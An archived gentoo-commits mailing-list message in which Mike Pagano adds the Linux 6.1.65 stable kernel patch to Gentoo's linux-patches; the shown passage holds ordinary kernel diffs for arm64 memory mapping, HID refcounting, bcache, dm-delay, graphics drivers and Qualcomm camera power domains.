public inbox for gentoo-commits@lists.gentoo.org
 help / color / mirror / Atom feed
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-12-03 11:16 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-12-03 11:16 UTC (permalink / raw
  To: gentoo-commits

commit:     60297308479e47932e515186d086233dc4aefa39
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Sun Dec  3 11:16:03 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Sun Dec  3 11:16:03 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=60297308

Linux patch 6.1.65

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README             |    4 +
 1064_linux-6.1.65.patch | 4244 +++++++++++++++++++++++++++++++++++++++++++++++
 2 files changed, 4248 insertions(+)

diff --git a/0000_README b/0000_README
index 8892941f..08e6f2e1 100644
--- a/0000_README
+++ b/0000_README
@@ -299,6 +299,10 @@ Patch:  1063_linux-6.1.64.patch
 From:   https://www.kernel.org
 Desc:   Linux 6.1.64
 
+Patch:  1064_linux-6.1.65.patch
+From:   https://www.kernel.org
+Desc:   Linux 6.1.65
+
 Patch:  1500_XATTR_USER_PREFIX.patch
 From:   https://bugs.gentoo.org/show_bug.cgi?id=470644
 Desc:   Support for namespace user.pax.* on tmpfs.

diff --git a/1064_linux-6.1.65.patch b/1064_linux-6.1.65.patch
new file mode 100644
index 00000000..70227a3a
--- /dev/null
+++ b/1064_linux-6.1.65.patch
@@ -0,0 +1,4244 @@
+diff --git a/Makefile b/Makefile
+index 97c75ae364cdf..1646e334a647f 100644
+--- a/Makefile
++++ b/Makefile
+@@ -1,7 +1,7 @@
+ # SPDX-License-Identifier: GPL-2.0
+ VERSION = 6
+ PATCHLEVEL = 1
+-SUBLEVEL = 64
++SUBLEVEL = 65
+ EXTRAVERSION =
+ NAME = Curry Ramen
+ 
+diff --git a/arch/arm/xen/enlighten.c b/arch/arm/xen/enlighten.c
+index b647306eb1608..d12fdb9c05a89 100644
+--- a/arch/arm/xen/enlighten.c
++++ b/arch/arm/xen/enlighten.c
+@@ -484,7 +484,8 @@ static int __init xen_guest_init(void)
+ 	 * for secondary CPUs as they are brought up.
+ 	 * For uniformity we use VCPUOP_register_vcpu_info even on cpu0.
+ 	 */
+-	xen_vcpu_info = alloc_percpu(struct vcpu_info);
++	xen_vcpu_info = __alloc_percpu(sizeof(struct vcpu_info),
++				       1 << fls(sizeof(struct vcpu_info) - 1));
+ 	if (xen_vcpu_info == NULL)
+ 		return -ENOMEM;
+ 
+diff --git a/arch/arm64/boot/dts/freescale/imx8mn-var-som.dtsi b/arch/arm64/boot/dts/freescale/imx8mn-var-som.dtsi
+index faafefe562e4b..d74c126d5ee07 100644
+--- a/arch/arm64/boot/dts/freescale/imx8mn-var-som.dtsi
++++ b/arch/arm64/boot/dts/freescale/imx8mn-var-som.dtsi
+@@ -27,6 +27,7 @@
+ 		regulator-name = "eth_phy_pwr";
+ 		regulator-min-microvolt = <3300000>;
+ 		regulator-max-microvolt = <3300000>;
++		regulator-enable-ramp-delay = <20000>;
+ 		gpio = <&gpio2 9 GPIO_ACTIVE_HIGH>;
+ 		enable-active-high;
+ 	};
+diff --git a/arch/arm64/include/asm/kfence.h b/arch/arm64/include/asm/kfence.h
+index aa855c6a0ae6f..a81937fae9f6d 100644
+--- a/arch/arm64/include/asm/kfence.h
++++ b/arch/arm64/include/asm/kfence.h
+@@ -19,4 +19,14 @@ static inline bool kfence_protect_page(unsigned long addr, bool protect)
+ 	return true;
+ }
+ 
++#ifdef CONFIG_KFENCE
++extern bool kfence_early_init;
++static inline bool arm64_kfence_can_set_direct_map(void)
++{
++	return !kfence_early_init;
++}
++#else /* CONFIG_KFENCE */
++static inline bool arm64_kfence_can_set_direct_map(void) { return false; }
++#endif /* CONFIG_KFENCE */
++
+ #endif /* __ASM_KFENCE_H */
+diff --git a/arch/arm64/include/asm/setup.h b/arch/arm64/include/asm/setup.h
+index f4af547ef54ca..2e4d7da74fb87 100644
+--- a/arch/arm64/include/asm/setup.h
++++ b/arch/arm64/include/asm/setup.h
+@@ -21,9 +21,22 @@ static inline bool arch_parse_debug_rodata(char *arg)
+ 	extern bool rodata_enabled;
+ 	extern bool rodata_full;
+ 
+-	if (arg && !strcmp(arg, "full")) {
++	if (!arg)
++		return false;
++
++	if (!strcmp(arg, "full")) {
++		rodata_enabled = rodata_full = true;
++		return true;
++	}
++
++	if (!strcmp(arg, "off")) {
++		rodata_enabled = rodata_full = false;
++		return true;
++	}
++
++	if (!strcmp(arg, "on")) {
+ 		rodata_enabled = true;
+-		rodata_full = true;
++		rodata_full = false;
+ 		return true;
+ 	}
+ 
+diff --git a/arch/arm64/mm/mmu.c b/arch/arm64/mm/mmu.c
+index 9a7c389651540..4b302dbf78e96 100644
+--- a/arch/arm64/mm/mmu.c
++++ b/arch/arm64/mm/mmu.c
+@@ -24,6 +24,7 @@
+ #include <linux/mm.h>
+ #include <linux/vmalloc.h>
+ #include <linux/set_memory.h>
++#include <linux/kfence.h>
+ 
+ #include <asm/barrier.h>
+ #include <asm/cputype.h>
+@@ -38,6 +39,7 @@
+ #include <asm/ptdump.h>
+ #include <asm/tlbflush.h>
+ #include <asm/pgalloc.h>
++#include <asm/kfence.h>
+ 
+ #define NO_BLOCK_MAPPINGS	BIT(0)
+ #define NO_CONT_MAPPINGS	BIT(1)
+@@ -521,12 +523,67 @@ static int __init enable_crash_mem_map(char *arg)
+ }
+ early_param("crashkernel", enable_crash_mem_map);
+ 
++#ifdef CONFIG_KFENCE
++
++bool __ro_after_init kfence_early_init = !!CONFIG_KFENCE_SAMPLE_INTERVAL;
++
++/* early_param() will be parsed before map_mem() below. */
++static int __init parse_kfence_early_init(char *arg)
++{
++	int val;
++
++	if (get_option(&arg, &val))
++		kfence_early_init = !!val;
++	return 0;
++}
++early_param("kfence.sample_interval", parse_kfence_early_init);
++
++static phys_addr_t __init arm64_kfence_alloc_pool(void)
++{
++	phys_addr_t kfence_pool;
++
++	if (!kfence_early_init)
++		return 0;
++
++	kfence_pool = memblock_phys_alloc(KFENCE_POOL_SIZE, PAGE_SIZE);
++	if (!kfence_pool) {
++		pr_err("failed to allocate kfence pool\n");
++		kfence_early_init = false;
++		return 0;
++	}
++
++	/* Temporarily mark as NOMAP. */
++	memblock_mark_nomap(kfence_pool, KFENCE_POOL_SIZE);
++
++	return kfence_pool;
++}
++
++static void __init arm64_kfence_map_pool(phys_addr_t kfence_pool, pgd_t *pgdp)
++{
++	if (!kfence_pool)
++		return;
++
++	/* KFENCE pool needs page-level mapping. */
++	__map_memblock(pgdp, kfence_pool, kfence_pool + KFENCE_POOL_SIZE,
++			pgprot_tagged(PAGE_KERNEL),
++			NO_BLOCK_MAPPINGS | NO_CONT_MAPPINGS);
++	memblock_clear_nomap(kfence_pool, KFENCE_POOL_SIZE);
++	__kfence_pool = phys_to_virt(kfence_pool);
++}
++#else /* CONFIG_KFENCE */
++
++static inline phys_addr_t arm64_kfence_alloc_pool(void) { return 0; }
++static inline void arm64_kfence_map_pool(phys_addr_t kfence_pool, pgd_t *pgdp) { }
++
++#endif /* CONFIG_KFENCE */
++
+ static void __init map_mem(pgd_t *pgdp)
+ {
+ 	static const u64 direct_map_end = _PAGE_END(VA_BITS_MIN);
+ 	phys_addr_t kernel_start = __pa_symbol(_stext);
+ 	phys_addr_t kernel_end = __pa_symbol(__init_begin);
+ 	phys_addr_t start, end;
++	phys_addr_t early_kfence_pool;
+ 	int flags = NO_EXEC_MAPPINGS;
+ 	u64 i;
+ 
+@@ -539,6 +596,8 @@ static void __init map_mem(pgd_t *pgdp)
+ 	 */
+ 	BUILD_BUG_ON(pgd_index(direct_map_end - 1) == pgd_index(direct_map_end));
+ 
++	early_kfence_pool = arm64_kfence_alloc_pool();
++
+ 	if (can_set_direct_map())
+ 		flags |= NO_BLOCK_MAPPINGS | NO_CONT_MAPPINGS;
+ 
+@@ -604,6 +663,8 @@ static void __init map_mem(pgd_t *pgdp)
+ 		}
+ 	}
+ #endif
++
++	arm64_kfence_map_pool(early_kfence_pool, pgdp);
+ }
+ 
+ void mark_rodata_ro(void)
+diff --git a/arch/arm64/mm/pageattr.c b/arch/arm64/mm/pageattr.c
+index 5922178d7a064..826cb200b204f 100644
+--- a/arch/arm64/mm/pageattr.c
++++ b/arch/arm64/mm/pageattr.c
+@@ -11,6 +11,7 @@
+ #include <asm/cacheflush.h>
+ #include <asm/set_memory.h>
+ #include <asm/tlbflush.h>
++#include <asm/kfence.h>
+ 
+ struct page_change_data {
+ 	pgprot_t set_mask;
+@@ -22,12 +23,14 @@ bool rodata_full __ro_after_init = IS_ENABLED(CONFIG_RODATA_FULL_DEFAULT_ENABLED
+ bool can_set_direct_map(void)
+ {
+ 	/*
+-	 * rodata_full, DEBUG_PAGEALLOC and KFENCE require linear map to be
++	 * rodata_full and DEBUG_PAGEALLOC require linear map to be
+ 	 * mapped at page granularity, so that it is possible to
+ 	 * protect/unprotect single pages.
++	 *
++	 * KFENCE pool requires page-granular mapping if initialized late.
+ 	 */
+-	return (rodata_enabled && rodata_full) || debug_pagealloc_enabled() ||
+-		IS_ENABLED(CONFIG_KFENCE);
++	return rodata_full || debug_pagealloc_enabled() ||
++	       arm64_kfence_can_set_direct_map();
+ }
+ 
+ static int change_page_range(pte_t *ptep, unsigned long addr, void *data)
+@@ -102,8 +105,7 @@ static int change_memory_common(unsigned long addr, int numpages,
+ 	 * If we are manipulating read-only permissions, apply the same
+ 	 * change to the linear mapping of the pages that back this VM area.
+ 	 */
+-	if (rodata_enabled &&
+-	    rodata_full && (pgprot_val(set_mask) == PTE_RDONLY ||
++	if (rodata_full && (pgprot_val(set_mask) == PTE_RDONLY ||
+ 			    pgprot_val(clear_mask) == PTE_RDONLY)) {
+ 		for (i = 0; i < area->nr_pages; i++) {
+ 			__change_memory_common((u64)page_address(area->pages[i]),
+diff --git a/arch/mips/kvm/mmu.c b/arch/mips/kvm/mmu.c
+index 74cd64a24d059..19ec27be20f06 100644
+--- a/arch/mips/kvm/mmu.c
++++ b/arch/mips/kvm/mmu.c
+@@ -593,7 +593,7 @@ static int kvm_mips_map_page(struct kvm_vcpu *vcpu, unsigned long gpa,
+ 	gfn_t gfn = gpa >> PAGE_SHIFT;
+ 	int srcu_idx, err;
+ 	kvm_pfn_t pfn;
+-	pte_t *ptep, entry, old_pte;
++	pte_t *ptep, entry;
+ 	bool writeable;
+ 	unsigned long prot_bits;
+ 	unsigned long mmu_seq;
+@@ -665,7 +665,6 @@ retry:
+ 	entry = pfn_pte(pfn, __pgprot(prot_bits));
+ 
+ 	/* Write the PTE */
+-	old_pte = *ptep;
+ 	set_pte(ptep, entry);
+ 
+ 	err = 0;
+diff --git a/drivers/acpi/resource.c b/drivers/acpi/resource.c
+index 99bab31919e4c..c297e40c5bdc0 100644
+--- a/drivers/acpi/resource.c
++++ b/drivers/acpi/resource.c
+@@ -446,6 +446,13 @@ static const struct dmi_system_id asus_laptop[] = {
+ 			DMI_MATCH(DMI_BOARD_NAME, "B1402CBA"),
+ 		},
+ 	},
++	{
++		/* Asus ExpertBook B1402CVA */
++		.matches = {
++			DMI_MATCH(DMI_SYS_VENDOR, "ASUSTeK COMPUTER INC."),
++			DMI_MATCH(DMI_BOARD_NAME, "B1402CVA"),
++		},
++	},
+ 	{
+ 		.ident = "Asus ExpertBook B2402CBA",
+ 		.matches = {
+diff --git a/drivers/ata/pata_isapnp.c b/drivers/ata/pata_isapnp.c
+index 43bb224430d3c..8892931ea8676 100644
+--- a/drivers/ata/pata_isapnp.c
++++ b/drivers/ata/pata_isapnp.c
+@@ -82,6 +82,9 @@ static int isapnp_init_one(struct pnp_dev *idev, const struct pnp_device_id *dev
+ 	if (pnp_port_valid(idev, 1)) {
+ 		ctl_addr = devm_ioport_map(&idev->dev,
+ 					   pnp_port_start(idev, 1), 1);
++		if (!ctl_addr)
++			return -ENOMEM;
++
+ 		ap->ioaddr.altstatus_addr = ctl_addr;
+ 		ap->ioaddr.ctl_addr = ctl_addr;
+ 		ap->ops = &isapnp_port_ops;
+diff --git a/drivers/gpu/drm/i915/gt/intel_gt.c b/drivers/gpu/drm/i915/gt/intel_gt.c
+index d12ec092e62df..91a005c46b107 100644
+--- a/drivers/gpu/drm/i915/gt/intel_gt.c
++++ b/drivers/gpu/drm/i915/gt/intel_gt.c
+@@ -903,8 +903,6 @@ int intel_gt_probe_all(struct drm_i915_private *i915)
+ 
+ err:
+ 	i915_probe_error(i915, "Failed to initialize %s! (%d)\n", gtdef->name, ret);
+-	intel_gt_release_all(i915);
+-
+ 	return ret;
+ }
+ 
+@@ -923,15 +921,6 @@ int intel_gt_tiles_init(struct drm_i915_private *i915)
+ 	return 0;
+ }
+ 
+-void intel_gt_release_all(struct drm_i915_private *i915)
+-{
+-	struct intel_gt *gt;
+-	unsigned int id;
+-
+-	for_each_gt(gt, i915, id)
+-		i915->gt[id] = NULL;
+-}
+-
+ void intel_gt_info_print(const struct intel_gt_info *info,
+ 			 struct drm_printer *p)
+ {
+diff --git a/drivers/gpu/drm/i915/i915_driver.c b/drivers/gpu/drm/i915/i915_driver.c
+index 75a93951fe429..be0ebed2a360f 100644
+--- a/drivers/gpu/drm/i915/i915_driver.c
++++ b/drivers/gpu/drm/i915/i915_driver.c
+@@ -901,7 +901,7 @@ int i915_driver_probe(struct pci_dev *pdev, const struct pci_device_id *ent)
+ 
+ 	ret = i915_driver_mmio_probe(i915);
+ 	if (ret < 0)
+-		goto out_tiles_cleanup;
++		goto out_runtime_pm_put;
+ 
+ 	ret = i915_driver_hw_probe(i915);
+ 	if (ret < 0)
+@@ -959,8 +959,6 @@ out_cleanup_hw:
+ 	i915_ggtt_driver_late_release(i915);
+ out_cleanup_mmio:
+ 	i915_driver_mmio_release(i915);
+-out_tiles_cleanup:
+-	intel_gt_release_all(i915);
+ out_runtime_pm_put:
+ 	enable_rpm_wakeref_asserts(&i915->runtime_pm);
+ 	i915_driver_late_release(i915);
+diff --git a/drivers/gpu/drm/panel/panel-boe-tv101wum-nl6.c b/drivers/gpu/drm/panel/panel-boe-tv101wum-nl6.c
+index c924f1124ebca..1c008bd9102ff 100644
+--- a/drivers/gpu/drm/panel/panel-boe-tv101wum-nl6.c
++++ b/drivers/gpu/drm/panel/panel-boe-tv101wum-nl6.c
+@@ -36,6 +36,7 @@ struct panel_desc {
+ 	const struct panel_init_cmd *init_cmds;
+ 	unsigned int lanes;
+ 	bool discharge_on_disable;
++	bool lp11_before_reset;
+ };
+ 
+ struct boe_panel {
+@@ -1269,6 +1270,10 @@ static int boe_panel_prepare(struct drm_panel *panel)
+ 
+ 	usleep_range(10000, 11000);
+ 
++	if (boe->desc->lp11_before_reset) {
++		mipi_dsi_dcs_nop(boe->dsi);
++		usleep_range(1000, 2000);
++	}
+ 	gpiod_set_value(boe->enable_gpio, 1);
+ 	usleep_range(1000, 2000);
+ 	gpiod_set_value(boe->enable_gpio, 0);
+@@ -1468,6 +1473,7 @@ static const struct panel_desc auo_b101uan08_3_desc = {
+ 	.mode_flags = MIPI_DSI_MODE_VIDEO | MIPI_DSI_MODE_VIDEO_SYNC_PULSE |
+ 		      MIPI_DSI_MODE_LPM,
+ 	.init_cmds = auo_b101uan08_3_init_cmd,
++	.lp11_before_reset = true,
+ };
+ 
+ static const struct drm_display_mode boe_tv105wum_nw0_default_mode = {
+@@ -1495,6 +1501,7 @@ static const struct panel_desc boe_tv105wum_nw0_desc = {
+ 	.mode_flags = MIPI_DSI_MODE_VIDEO | MIPI_DSI_MODE_VIDEO_SYNC_PULSE |
+ 		      MIPI_DSI_MODE_LPM,
+ 	.init_cmds = boe_init_cmd,
++	.lp11_before_reset = true,
+ };
+ 
+ static int boe_panel_get_modes(struct drm_panel *panel,
+diff --git a/drivers/gpu/drm/panel/panel-simple.c b/drivers/gpu/drm/panel/panel-simple.c
+index 0e8622ccd3a0f..005377f58eb4a 100644
+--- a/drivers/gpu/drm/panel/panel-simple.c
++++ b/drivers/gpu/drm/panel/panel-simple.c
+@@ -2205,13 +2205,13 @@ static const struct panel_desc innolux_g070y2_t02 = {
+ static const struct display_timing innolux_g101ice_l01_timing = {
+ 	.pixelclock = { 60400000, 71100000, 74700000 },
+ 	.hactive = { 1280, 1280, 1280 },
+-	.hfront_porch = { 41, 80, 100 },
+-	.hback_porch = { 40, 79, 99 },
+-	.hsync_len = { 1, 1, 1 },
++	.hfront_porch = { 30, 60, 70 },
++	.hback_porch = { 30, 60, 70 },
++	.hsync_len = { 22, 40, 60 },
+ 	.vactive = { 800, 800, 800 },
+-	.vfront_porch = { 5, 11, 14 },
+-	.vback_porch = { 4, 11, 14 },
+-	.vsync_len = { 1, 1, 1 },
++	.vfront_porch = { 3, 8, 14 },
++	.vback_porch = { 3, 8, 14 },
++	.vsync_len = { 4, 7, 12 },
+ 	.flags = DISPLAY_FLAGS_DE_HIGH,
+ };
+ 
+@@ -2228,6 +2228,7 @@ static const struct panel_desc innolux_g101ice_l01 = {
+ 		.disable = 200,
+ 	},
+ 	.bus_format = MEDIA_BUS_FMT_RGB888_1X7X4_SPWG,
++	.bus_flags = DRM_BUS_FLAG_DE_HIGH,
+ 	.connector_type = DRM_MODE_CONNECTOR_LVDS,
+ };
+ 
+diff --git a/drivers/gpu/drm/rockchip/rockchip_drm_vop.c b/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
+index ae8c532f7fc84..632ab8941eb44 100644
+--- a/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
++++ b/drivers/gpu/drm/rockchip/rockchip_drm_vop.c
+@@ -248,14 +248,22 @@ static inline void vop_cfg_done(struct vop *vop)
+ 	VOP_REG_SET(vop, common, cfg_done, 1);
+ }
+ 
+-static bool has_rb_swapped(uint32_t format)
++static bool has_rb_swapped(uint32_t version, uint32_t format)
+ {
+ 	switch (format) {
+ 	case DRM_FORMAT_XBGR8888:
+ 	case DRM_FORMAT_ABGR8888:
+-	case DRM_FORMAT_BGR888:
+ 	case DRM_FORMAT_BGR565:
+ 		return true;
++	/*
++	 * full framework (IP version 3.x) only need rb swapped for RGB888 and
++	 * little framework (IP version 2.x) only need rb swapped for BGR888,
++	 * check for 3.x to also only rb swap BGR888 for unknown vop version
++	 */
++	case DRM_FORMAT_RGB888:
++		return VOP_MAJOR(version) == 3;
++	case DRM_FORMAT_BGR888:
++		return VOP_MAJOR(version) != 3;
+ 	default:
+ 		return false;
+ 	}
+@@ -1017,7 +1025,7 @@ static void vop_plane_atomic_update(struct drm_plane *plane,
+ 	VOP_WIN_SET(vop, win, dsp_info, dsp_info);
+ 	VOP_WIN_SET(vop, win, dsp_st, dsp_st);
+ 
+-	rb_swap = has_rb_swapped(fb->format->format);
++	rb_swap = has_rb_swapped(vop->data->version, fb->format->format);
+ 	VOP_WIN_SET(vop, win, rb_swap, rb_swap);
+ 
+ 	/*
+diff --git a/drivers/hid/hid-core.c b/drivers/hid/hid-core.c
+index 799a3086dbb06..cdad3a0662876 100644
+--- a/drivers/hid/hid-core.c
++++ b/drivers/hid/hid-core.c
+@@ -707,15 +707,22 @@ static void hid_close_report(struct hid_device *device)
+  * Free a device structure, all reports, and all fields.
+  */
+ 
+-static void hid_device_release(struct device *dev)
++void hiddev_free(struct kref *ref)
+ {
+-	struct hid_device *hid = to_hid_device(dev);
++	struct hid_device *hid = container_of(ref, struct hid_device, ref);
+ 
+ 	hid_close_report(hid);
+ 	kfree(hid->dev_rdesc);
+ 	kfree(hid);
+ }
+ 
++static void hid_device_release(struct device *dev)
++{
++	struct hid_device *hid = to_hid_device(dev);
++
++	kref_put(&hid->ref, hiddev_free);
++}
++
+ /*
+  * Fetch a report description item from the data stream. We support long
+  * items, though they are not used yet.
+@@ -2813,6 +2820,7 @@ struct hid_device *hid_allocate_device(void)
+ 	spin_lock_init(&hdev->debug_list_lock);
+ 	sema_init(&hdev->driver_input_lock, 1);
+ 	mutex_init(&hdev->ll_open_lock);
++	kref_init(&hdev->ref);
+ 
+ 	return hdev;
+ }
+diff --git a/drivers/hid/hid-debug.c b/drivers/hid/hid-debug.c
+index 15e35702773cd..7f78622b1b0b3 100644
+--- a/drivers/hid/hid-debug.c
++++ b/drivers/hid/hid-debug.c
+@@ -1132,6 +1132,7 @@ static int hid_debug_events_open(struct inode *inode, struct file *file)
+ 		goto out;
+ 	}
+ 	list->hdev = (struct hid_device *) inode->i_private;
++	kref_get(&list->hdev->ref);
+ 	file->private_data = list;
+ 	mutex_init(&list->read_mutex);
+ 
+@@ -1224,6 +1225,8 @@ static int hid_debug_events_release(struct inode *inode, struct file *file)
+ 	list_del(&list->node);
+ 	spin_unlock_irqrestore(&list->hdev->debug_list_lock, flags);
+ 	kfifo_free(&list->hid_debug_fifo);
++
++	kref_put(&list->hdev->ref, hiddev_free);
+ 	kfree(list);
+ 
+ 	return 0;
+diff --git a/drivers/md/bcache/btree.c b/drivers/md/bcache/btree.c
+index 68b9d7ca864e2..4d3595d6d1c40 100644
+--- a/drivers/md/bcache/btree.c
++++ b/drivers/md/bcache/btree.c
+@@ -1342,7 +1342,7 @@ static int btree_gc_coalesce(struct btree *b, struct btree_op *op,
+ 	memset(new_nodes, 0, sizeof(new_nodes));
+ 	closure_init_stack(&cl);
+ 
+-	while (nodes < GC_MERGE_NODES && !IS_ERR(r[nodes].b))
++	while (nodes < GC_MERGE_NODES && !IS_ERR_OR_NULL(r[nodes].b))
+ 		keys += r[nodes++].keys;
+ 
+ 	blocks = btree_default_blocks(b->c) * 2 / 3;
+@@ -1506,6 +1506,8 @@ static int btree_gc_rewrite_node(struct btree *b, struct btree_op *op,
+ 		return 0;
+ 
+ 	n = btree_node_alloc_replacement(replace, NULL);
++	if (IS_ERR(n))
++		return 0;
+ 
+ 	/* recheck reserve after allocating replacement node */
+ 	if (btree_check_reserve(b, NULL)) {
+diff --git a/drivers/md/bcache/sysfs.c b/drivers/md/bcache/sysfs.c
+index c6f677059214d..025fe6479bb68 100644
+--- a/drivers/md/bcache/sysfs.c
++++ b/drivers/md/bcache/sysfs.c
+@@ -1103,7 +1103,7 @@ SHOW(__bch_cache)
+ 			sum += INITIAL_PRIO - cached[i];
+ 
+ 		if (n)
+-			do_div(sum, n);
++			sum = div64_u64(sum, n);
+ 
+ 		for (i = 0; i < ARRAY_SIZE(q); i++)
+ 			q[i] = INITIAL_PRIO - cached[n * (i + 1) /
+diff --git a/drivers/md/bcache/writeback.c b/drivers/md/bcache/writeback.c
+index 7bac2a88b794a..01c7c6ca4789f 100644
+--- a/drivers/md/bcache/writeback.c
++++ b/drivers/md/bcache/writeback.c
+@@ -977,24 +977,35 @@ static int bch_btre_dirty_init_thread_nr(void)
+ void bch_sectors_dirty_init(struct bcache_device *d)
+ {
+ 	int i;
++	struct btree *b = NULL;
+ 	struct bkey *k = NULL;
+ 	struct btree_iter iter;
+ 	struct sectors_dirty_init op;
+ 	struct cache_set *c = d->c;
+ 	struct bch_dirty_init_state state;
+ 
++retry_lock:
++	b = c->root;
++	rw_lock(0, b, b->level);
++	if (b != c->root) {
++		rw_unlock(0, b);
++		goto retry_lock;
++	}
++
+ 	/* Just count root keys if no leaf node */
+-	rw_lock(0, c->root, c->root->level);
+ 	if (c->root->level == 0) {
+ 		bch_btree_op_init(&op.op, -1);
+ 		op.inode = d->id;
+ 		op.count = 0;
+ 
+ 		for_each_key_filter(&c->root->keys,
+-				    k, &iter, bch_ptr_invalid)
++				    k, &iter, bch_ptr_invalid) {
++			if (KEY_INODE(k) != op.inode)
++				continue;
+ 			sectors_dirty_init_fn(&op.op, c->root, k);
++		}
+ 
+-		rw_unlock(0, c->root);
++		rw_unlock(0, b);
+ 		return;
+ 	}
+ 
+@@ -1014,23 +1025,24 @@ void bch_sectors_dirty_init(struct bcache_device *d)
+ 		if (atomic_read(&state.enough))
+ 			break;
+ 
++		atomic_inc(&state.started);
+ 		state.infos[i].state = &state;
+ 		state.infos[i].thread =
+ 			kthread_run(bch_dirty_init_thread, &state.infos[i],
+ 				    "bch_dirtcnt[%d]", i);
+ 		if (IS_ERR(state.infos[i].thread)) {
+ 			pr_err("fails to run thread bch_dirty_init[%d]\n", i);
++			atomic_dec(&state.started);
+ 			for (--i; i >= 0; i--)
+ 				kthread_stop(state.infos[i].thread);
+ 			goto out;
+ 		}
+-		atomic_inc(&state.started);
+ 	}
+ 
+ out:
+ 	/* Must wait for all threads to stop. */
+ 	wait_event(state.wait, atomic_read(&state.started) == 0);
+-	rw_unlock(0, c->root);
++	rw_unlock(0, b);
+ }
+ 
+ void bch_cached_dev_writeback_init(struct cached_dev *dc)
+diff --git a/drivers/md/dm-delay.c b/drivers/md/dm-delay.c
+index 02b8f4e818276..43541c8e2b43d 100644
+--- a/drivers/md/dm-delay.c
++++ b/drivers/md/dm-delay.c
+@@ -30,7 +30,7 @@ struct delay_c {
+ 	struct workqueue_struct *kdelayd_wq;
+ 	struct work_struct flush_expired_bios;
+ 	struct list_head delayed_bios;
+-	atomic_t may_delay;
++	bool may_delay;
+ 
+ 	struct delay_class read;
+ 	struct delay_class write;
+@@ -191,7 +191,7 @@ static int delay_ctr(struct dm_target *ti, unsigned int argc, char **argv)
+ 	INIT_WORK(&dc->flush_expired_bios, flush_expired_bios);
+ 	INIT_LIST_HEAD(&dc->delayed_bios);
+ 	mutex_init(&dc->timer_lock);
+-	atomic_set(&dc->may_delay, 1);
++	dc->may_delay = true;
+ 	dc->argc = argc;
+ 
+ 	ret = delay_class_ctr(ti, &dc->read, argv);
+@@ -246,7 +246,7 @@ static int delay_bio(struct delay_c *dc, struct delay_class *c, struct bio *bio)
+ 	struct dm_delay_info *delayed;
+ 	unsigned long expires = 0;
+ 
+-	if (!c->delay || !atomic_read(&dc->may_delay))
++	if (!c->delay)
+ 		return DM_MAPIO_REMAPPED;
+ 
+ 	delayed = dm_per_bio_data(bio, sizeof(struct dm_delay_info));
+@@ -255,6 +255,10 @@ static int delay_bio(struct delay_c *dc, struct delay_class *c, struct bio *bio)
+ 	delayed->expires = expires = jiffies + msecs_to_jiffies(c->delay);
+ 
+ 	mutex_lock(&delayed_bios_lock);
++	if (unlikely(!dc->may_delay)) {
++		mutex_unlock(&delayed_bios_lock);
++		return DM_MAPIO_REMAPPED;
++	}
+ 	c->ops++;
+ 	list_add_tail(&delayed->list, &dc->delayed_bios);
+ 	mutex_unlock(&delayed_bios_lock);
+@@ -268,7 +272,10 @@ static void delay_presuspend(struct dm_target *ti)
+ {
+ 	struct delay_c *dc = ti->private;
+ 
+-	atomic_set(&dc->may_delay, 0);
++	mutex_lock(&delayed_bios_lock);
++	dc->may_delay = false;
++	mutex_unlock(&delayed_bios_lock);
++
+ 	del_timer_sync(&dc->delay_timer);
+ 	flush_bios(flush_delayed_bios(dc, 1));
+ }
+@@ -277,7 +284,7 @@ static void delay_resume(struct dm_target *ti)
+ {
+ 	struct delay_c *dc = ti->private;
+ 
+-	atomic_set(&dc->may_delay, 1);
++	dc->may_delay = true;
+ }
+ 
+ static int delay_map(struct dm_target *ti, struct bio *bio)
+diff --git a/drivers/md/md.c b/drivers/md/md.c
+index e87507d29895e..20f67edae95d0 100644
+--- a/drivers/md/md.c
++++ b/drivers/md/md.c
+@@ -8648,7 +8648,8 @@ static void md_end_io_acct(struct bio *bio)
+ 	struct md_io_acct *md_io_acct = bio->bi_private;
+ 	struct bio *orig_bio = md_io_acct->orig_bio;
+ 
+-	orig_bio->bi_status = bio->bi_status;
++	if (bio->bi_status && !orig_bio->bi_status)
++		orig_bio->bi_status = bio->bi_status;
+ 
+ 	bio_end_io_acct(orig_bio, md_io_acct->start_time);
+ 	bio_put(bio);
+diff --git a/drivers/media/platform/qcom/camss/camss-vfe-170.c b/drivers/media/platform/qcom/camss/camss-vfe-170.c
+index 07b64d257512c..f9492b1d16e3e 100644
+--- a/drivers/media/platform/qcom/camss/camss-vfe-170.c
++++ b/drivers/media/platform/qcom/camss/camss-vfe-170.c
+@@ -671,7 +671,12 @@ out_unlock:
+  */
+ static void vfe_pm_domain_off(struct vfe_device *vfe)
+ {
+-	/* nop */
++	struct camss *camss = vfe->camss;
++
++	if (vfe->id >= camss->vfe_num)
++		return;
++
++	device_link_del(camss->genpd_link[vfe->id]);
+ }
+ 
+ /*
+@@ -680,6 +685,19 @@ static void vfe_pm_domain_off(struct vfe_device *vfe)
+  */
+ static int vfe_pm_domain_on(struct vfe_device *vfe)
+ {
++	struct camss *camss = vfe->camss;
++	enum vfe_line_id id = vfe->id;
++
++	if (id >= camss->vfe_num)
++		return 0;
++
++	camss->genpd_link[id] = device_link_add(camss->dev, camss->genpd[id],
++						DL_FLAG_STATELESS |
++						DL_FLAG_PM_RUNTIME |
++						DL_FLAG_RPM_ACTIVE);
++	if (!camss->genpd_link[id])
++		return -EINVAL;
++
+ 	return 0;
+ }
+ 
+diff --git a/drivers/media/platform/qcom/camss/camss-vfe-480.c b/drivers/media/platform/qcom/camss/camss-vfe-480.c
+index ab42600f7a745..72f5cfeeb49bf 100644
+--- a/drivers/media/platform/qcom/camss/camss-vfe-480.c
++++ b/drivers/media/platform/qcom/camss/camss-vfe-480.c
+@@ -478,7 +478,12 @@ out_unlock:
+  */
+ static void vfe_pm_domain_off(struct vfe_device *vfe)
+ {
+-	/* nop */
++	struct camss *camss = vfe->camss;
++
++	if (vfe->id >= camss->vfe_num)
++		return;
++
++	device_link_del(camss->genpd_link[vfe->id]);
+ }
+ 
+ /*
+@@ -487,6 +492,19 @@ static void vfe_pm_domain_off(struct vfe_device *vfe)
+  */
+ static int vfe_pm_domain_on(struct vfe_device *vfe)
+ {
